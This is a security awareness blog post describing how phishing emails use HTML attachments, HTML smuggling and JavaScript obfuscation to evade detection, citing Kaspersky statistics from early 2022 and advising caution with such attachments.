Phishing emails with HTML attachments still a huge concern in 2022

In the first four months of 2022, HTML files remained one of the most common attachments used in phishing attacks. This shows that the strategy is still successful against spam detection engines. Malicious actors often use HTML documents included in phishing emails.

HTML (HyperText Markup Language) is a markup language for text that will be displayed in a web browser. The files are digital content documents that are meant to be read in web browsers. These files are commonly used in phishing emails to link victims to malicious websites.

When it comes to hiding phishing information, HTML has more options than plain text email. Because HTML is not in itself malicious, email security software is less likely to detect attachments of concern. As a result, the email is often delivered successfully to the victims inbox.

Phishing Page
Phishing attachment that looks like a Microsoft login (BleepingComputer)

According to Kaspersky’s own statistics, the pattern of sending infected emails with HTML files is still strong. In the first four months of the year, the security firm discovered 2 million such emails targeted at its clients. The highest number of detections was 851,000 in March 2022. But there was reduction to 387,000 in April might be a temporary glitch.

Malicious Email Statistics
Malicious HTML attachment detection (Kaspersky)

How does HTML stay undetected?

Phishing forms, redirection techniques, and data-stealing components are frequently employed in HTML attachments, ranging from basic redirection to obfuscating JavaScript to hide phishing forms. Because antivirus and other security tools may detect harmful scripts or URLs in plaintext, cybercriminals use JavaScript obfuscation instead.

HTML smuggling is the technique of hiding malicious URLs and behaviour in HTML attachments using JavaScript. It has grown increasingly popular in recent years.

Another method for concealing phishing material in email attachments is to encode or compress the code. This will look considerably smaller than it actually is. Threat actors obfuscate their code to make malicious scripts even more difficult to find, using publicly accessible tools.  That allows unique custom setups which are less likely to be identified.

According to Kaspersky threat actors employed “morse code” in their HTML attachment to hide a phishing form that would be shown when the HTML attachment was accessed.

Morse Code HTML file
Phishing attachment source/morse code HTML (BleepingComputer)

Threat actors in such circumstances employ deprecated functions like “unescape(),” according to Kaspersky. In the string, this replaces ” % xx” character sequences with their ASCII values.

Although decodeURI() and decodeURIComponent() have mostly replaced it, most modern browsers still support them. It is likely that security tools and spam detection engines that are more focused on existing tactics would miss it.

Phishing sites exist in many shapes and sizes, but they’re frequently made to seem exactly like real web pages so that visitors don’t hesitate to submit their credentials.

Consider the following

Even though HTML attachment distribution had its “glory days” in 2019, it is no longer recommended. It’s necessary to keep alert since threat actors use this tactic frequently in phishing attacks.

It is important that viewing these files may result in the execution of JavaScript on your computer. This might lead to malware being created automatically on your computer and security systems being bypassed.

Phishing Email
Email phishing using an HTML attachment (Kaspersky)

Even if your email security system doesn’t issue any alerts, HTML attachments should always be treated with caution.

Avoid opening emails from unknown senders, or any attachments they may include, to keep from falling victim to phishing scams. Although Word files, PDFs, and other documents are often attached to emails, HTML attachments are hardly shared. If you see one in your inbox, it’s almost certainly a phishing email.

Has your organisation started to increase cyber security measures yet? Start your two-week free trial today.

Recent posts